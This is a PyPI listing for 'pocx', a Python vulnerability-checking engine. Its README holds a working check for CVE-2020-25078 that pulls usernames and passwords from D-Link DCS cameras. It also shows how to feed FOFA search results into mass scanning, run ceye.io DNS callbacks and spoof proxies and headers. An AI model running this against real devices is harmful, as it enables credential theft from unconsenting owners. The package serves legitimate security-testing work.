Name | pocx JSON |
Version |
0.2.3
JSON |
| download |
home_page | https://github.com/antx-code/pocx |
Summary | A Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode. |
upload_time | 2023-07-04 02:20:34 |
maintainer | |
docs_url | None |
author | antx |
requires_python | >=3.8,<4.0 |
license | MIT |
keywords |
async
poc
engine
pocx
|
VCS |
|
bugtrack_url |
|
requirements |
No requirements were recorded.
|
Travis-CI |
No Travis.
|
coveralls test coverage |
|
# pocx
A Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.
## Description
pocx is a simple, fast and powerful poc engine tools, which support synchronous mode and asynchronous mode. pocx also
support some useful features, which like fofa search and parse assets to verify. You also can use smart method to verify
some special assets by using ceyeio, which it is cannot return or display the result.
## Install
```bash
pip3 install pocx
```
## Usage
### POC Template
```python
# Title: xxxxxxx
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-xxxx-xxxxx
from pocx import BasicPoc, AioPoc
class POC(BasicPoc):
def __init__(self):
self.name = 'poc'
super(POC, self).__init__()
def poc(self, target):
"""
your poc code here.
"""
return
if __name__ == '__main__':
target = 'http://127.0.0.1'
cve = POC()
cve.run(target)
```
### Synchronous Mode Example
```python
# Title: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-2020-25078
from pocx import BasicPoc
from loguru import logger
class DLinkPoc(BasicPoc):
@logger.catch(level='ERROR')
def __init__(self):
self.name = 'D_Link-DCS-2530L'
super(DLinkPoc, self).__init__()
@logger.catch(level='ERROR')
def poc(self, target: str):
poc_url = '/config/getuser?index=0'
try:
resp = self.get(target + poc_url)
if resp.status_code == 200 and 'name=' in resp.text and 'pass=' in resp.text and 'priv=' in resp.text:
logger.success(resp.text)
elif resp.status_code == 500:
logger.error(f'[-] {target} {resp.status_code}')
except Exception as e:
logger.error(f'[-] {target} {e}')
if __name__ == '__main__':
target = 'http://127.0.0.1'
cve = DLinkPoc()
cve.run(target)
```
### Asynchronous Mode Example
```python
# Title: D-Link DCS系列监控 账号密码信息泄露 CVE-2020-25078
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-2020-25078
from pocx import AioPoc
from loguru import logger
class DLinkPoc(AioPoc):
@logger.catch(level='ERROR')
def __init__(self):
self.name = 'D_Link-DCS-2530L'
super(DLinkPoc, self).__init__()
@logger.catch(level='ERROR')
async def poc(self, target: str):
poc_url = '/config/getuser?index=0'
try:
resp = await self.aio_get(target + poc_url)
if resp.status_code == 200 and 'name=' in resp.text and 'pass=' in resp.text and 'priv=' in resp.text:
logger.success(resp.text)
elif resp.status_code == 500:
logger.error(f'[-] {target} {resp.status_code}')
except Exception as e:
logger.error(f'[-] {target} {e}')
if __name__ == '__main__':
target = 'http://127.0.0.1'
cve = DLinkPoc()
cve.run(target)
```
### Useful Functions
#### FoFa
```python
# Title: xxxxxxx
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-xxxx-xxxxx
from pocx import BasicPoc, AioPoc
from pocx.funcs import Fofa
class POC(BasicPoc):
def __init__(self):
self.name = 'poc'
super(POC, self).__init__()
def poc(self, target):
"""
your poc code here.
"""
return
if __name__ == '__main__':
grammar = 'app="xxxxxx"'
cve = POC()
fofa = Fofa()
fofa.set_config(api_key='xxxxxx', api_email='xxxxxx')
print(f'[+] the asset account of grammar: {grammar} are: {fofa.asset_counts(grammar)}')
pages = fofa.asset_pages(grammar)
for page in range(1, pages + 1):
print(f'[*] page {page}')
assets = fofa.assets(grammar, page)
cve.run(assets)
```
#### Ceye
```python
# Title: xxxxxxx
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-xxxx-xxxxx
from pocx import BasicPoc, AioPoc
from pocx.funcs import Ceye
class POC(BasicPoc):
def __init__(self):
self.name = 'poc'
super(POC, self).__init__()
self.ceyeio = Ceye()
def poc(self, target):
pid = self.ceyeio.generate_payload_id()
self.ceyeio.set_config(api_token='xxxxxx', identifier='xxxxxx.ceye.io')
"""
your poc code here.
"""
self.ceyeio.verify(pid, 'dns')
return
```
#### Proxy
```python
# Title: xxxxxxx
# Author: antx
# Email: 7877940+antx-code@users.noreply.github.com
# CVE: CVE-xxxx-xxxxx
from pocx import BasicPoc, AioPoc
from pocx.funcs import Ceye
class POC(BasicPoc):
def __init__(self):
self.name = 'poc'
super(POC, self).__init__()
self.ceyeio = Ceye()
def poc(self, target):
pid = self.ceyeio.generate_payload_id()
self.ceyeio.set_config(api_token='xxxxxx', identifier='xxxxxx.ceye.io')
self.set_headers({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, '
'like Gecko) Chrome/87.0.4280.88 Safari/537.36'})
proxy = {
'all://': 'http://127.0.0.1:7890',
}
"""
or use httpx support proxy:
proxy = {
'http://': 'http://127.0.0.1:7890',
'https://': 'https://127.0.0.1:7890',
}
"""
self.set_proxies(proxy)
"""
your poc code here.
"""
self.ceyeio.verify(pid, 'dns')
return
if __name__ == '__main__':
target = 'http://127.0.0.1:8888'
cve = POC()
cve.run(target)
```
Raw data
{
"_id": null,
"home_page": "https://github.com/antx-code/pocx",
"name": "pocx",
"maintainer": "",
"docs_url": null,
"requires_python": ">=3.8,<4.0",
"maintainer_email": "",
"keywords": "async,poc,engine,pocx",
"author": "antx",
"author_email": "wkaifeng2007@163.com",
"download_url": "https://files.pythonhosted.org/packages/3a/db/153d1f2a1402611472d5f59322253e723da435346c4a2a406a3d2be3e1b3/pocx-0.2.3.tar.gz",
"platform": null,
"description": "# pocx\nA Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.\n\n## Description\npocx is a simple, fast and powerful poc engine tools, which support synchronous mode and asynchronous mode. pocx also \nsupport some useful features, which like fofa search and parse assets to verify. You also can use smart method to verify \nsome special assets by using ceyeio, which it is cannot return or display the result. \n\n## Install\n\n```bash\npip3 install pocx\n```\n\n## Usage\n\n### POC Template\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\n\n\nclass POC(BasicPoc):\n def __init__(self):\n self.name = 'poc'\n super(POC, self).__init__()\n\n def poc(self, target):\n \"\"\"\n \n your poc code here.\n \n \"\"\"\n return\n\n\nif __name__ == '__main__':\n target = 'http://127.0.0.1'\n cve = POC()\n cve.run(target)\n```\n\n### Synchronous Mode Example\n\n```python\n# Title: D-Link DCS\u7cfb\u5217\u76d1\u63a7 \u8d26\u53f7\u5bc6\u7801\u4fe1\u606f\u6cc4\u9732 CVE-2020-25078\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-2020-25078\n\nfrom pocx import BasicPoc\nfrom loguru import logger\n\n\nclass DLinkPoc(BasicPoc):\n @logger.catch(level='ERROR')\n def __init__(self):\n self.name = 'D_Link-DCS-2530L'\n super(DLinkPoc, self).__init__()\n\n @logger.catch(level='ERROR')\n def poc(self, target: str):\n poc_url = '/config/getuser?index=0'\n try:\n resp = self.get(target + poc_url)\n if resp.status_code == 200 and 'name=' in resp.text and 'pass=' in resp.text and 'priv=' in resp.text:\n logger.success(resp.text)\n elif resp.status_code == 500:\n logger.error(f'[-] {target} {resp.status_code}')\n except Exception as e:\n logger.error(f'[-] {target} {e}')\n\n\nif __name__ == '__main__':\n target = 'http://127.0.0.1'\n cve = DLinkPoc()\n cve.run(target)\n```\n\n### Asynchronous Mode Example\n\n```python\n# Title: D-Link DCS\u7cfb\u5217\u76d1\u63a7 \u8d26\u53f7\u5bc6\u7801\u4fe1\u606f\u6cc4\u9732 CVE-2020-25078\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-2020-25078\n\nfrom pocx import AioPoc\nfrom loguru import logger\n\n\nclass DLinkPoc(AioPoc):\n @logger.catch(level='ERROR')\n def __init__(self):\n self.name = 'D_Link-DCS-2530L'\n super(DLinkPoc, self).__init__()\n\n @logger.catch(level='ERROR')\n async def poc(self, target: str):\n poc_url = '/config/getuser?index=0'\n try:\n resp = await self.aio_get(target + poc_url)\n if resp.status_code == 200 and 'name=' in resp.text and 'pass=' in resp.text and 'priv=' in resp.text:\n logger.success(resp.text)\n elif resp.status_code == 500:\n logger.error(f'[-] {target} {resp.status_code}')\n except Exception as e:\n logger.error(f'[-] {target} {e}')\n\n\nif __name__ == '__main__':\n target = 'http://127.0.0.1'\n cve = DLinkPoc()\n cve.run(target)\n```\n\n### Useful Functions\n\n#### FoFa\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\nfrom pocx.funcs import Fofa\n\n\nclass POC(BasicPoc):\n def __init__(self):\n self.name = 'poc'\n super(POC, self).__init__()\n\n def poc(self, target):\n \"\"\"\n \n your poc code here.\n \n \"\"\"\n return\n\n\nif __name__ == '__main__':\n grammar = 'app=\"xxxxxx\"'\n cve = POC()\n fofa = Fofa()\n fofa.set_config(api_key='xxxxxx', api_email='xxxxxx')\n print(f'[+] the asset account of grammar: {grammar} are: {fofa.asset_counts(grammar)}')\n pages = fofa.asset_pages(grammar)\n for page in range(1, pages + 1):\n print(f'[*] page {page}')\n assets = fofa.assets(grammar, page)\n cve.run(assets)\n```\n\n#### Ceye\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\nfrom pocx.funcs import Ceye\n\n\nclass POC(BasicPoc):\n def __init__(self):\n self.name = 'poc'\n super(POC, self).__init__()\n self.ceyeio = Ceye()\n \n def poc(self, target):\n pid = self.ceyeio.generate_payload_id()\n self.ceyeio.set_config(api_token='xxxxxx', identifier='xxxxxx.ceye.io')\n \n \"\"\"\n \n your poc code here.\n \n \"\"\"\n \n self.ceyeio.verify(pid, 'dns')\n return\n```\n\n#### Proxy\n\n```python\n# Title: xxxxxxx\n# Author: antx\n# Email: 7877940+antx-code@users.noreply.github.com\n# CVE: CVE-xxxx-xxxxx\n\nfrom pocx import BasicPoc, AioPoc\nfrom pocx.funcs import Ceye\n\n\nclass POC(BasicPoc):\n def __init__(self):\n self.name = 'poc'\n super(POC, self).__init__()\n self.ceyeio = Ceye()\n\n def poc(self, target):\n pid = self.ceyeio.generate_payload_id()\n self.ceyeio.set_config(api_token='xxxxxx', identifier='xxxxxx.ceye.io')\n self.set_headers({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, '\n 'like Gecko) Chrome/87.0.4280.88 Safari/537.36'})\n proxy = {\n 'all://': 'http://127.0.0.1:7890',\n }\n \n \"\"\"\n \n or use httpx support proxy:\n proxy = {\n 'http://': 'http://127.0.0.1:7890',\n 'https://': 'https://127.0.0.1:7890',\n }\n \n \"\"\"\n \n self.set_proxies(proxy)\n\n \"\"\"\n \n your poc code here.\n \n \"\"\"\n\n self.ceyeio.verify(pid, 'dns')\n return\n \n\nif __name__ == '__main__':\n target = 'http://127.0.0.1:8888'\n cve = POC()\n cve.run(target)\n```\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "A Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.",
"version": "0.2.3",
"project_urls": {
"Homepage": "https://github.com/antx-code/pocx",
"Repository": "https://github.com/antx-code/pocx"
},
"split_keywords": [
"async",
"poc",
"engine",
"pocx"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "dcb452e800de49e7dc17f04572a14e421d17bebe1eca2372e76fb8d8f9c4c744",
"md5": "66021e2feefeb61b775fe6393f4baece",
"sha256": "fc1413daa854328307d7285a1504c5e9948eca89888b97dc8e355080fd1b959a"
},
"downloads": -1,
"filename": "pocx-0.2.3-py3-none-any.whl",
"has_sig": false,
"md5_digest": "66021e2feefeb61b775fe6393f4baece",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": ">=3.8,<4.0",
"size": 9160,
"upload_time": "2023-07-04T02:20:32",
"upload_time_iso_8601": "2023-07-04T02:20:32.231673Z",
"url": "https://files.pythonhosted.org/packages/dc/b4/52e800de49e7dc17f04572a14e421d17bebe1eca2372e76fb8d8f9c4c744/pocx-0.2.3-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "3adb153d1f2a1402611472d5f59322253e723da435346c4a2a406a3d2be3e1b3",
"md5": "65e25cafc9f8e3c90d5bbd683f52a186",
"sha256": "cd2e16df60e66f26fceab782e871674ff6efe94c2b250054a16c4e0e00b77764"
},
"downloads": -1,
"filename": "pocx-0.2.3.tar.gz",
"has_sig": false,
"md5_digest": "65e25cafc9f8e3c90d5bbd683f52a186",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.8,<4.0",
"size": 7633,
"upload_time": "2023-07-04T02:20:34",
"upload_time_iso_8601": "2023-07-04T02:20:34.357589Z",
"url": "https://files.pythonhosted.org/packages/3a/db/153d1f2a1402611472d5f59322253e723da435346c4a2a406a3d2be3e1b3/pocx-0.2.3.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2023-07-04 02:20:34",
"github": true,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"github_user": "antx-code",
"github_project": "pocx",
"travis_ci": false,
"coveralls": true,
"github_actions": false,
"lcname": "pocx"
}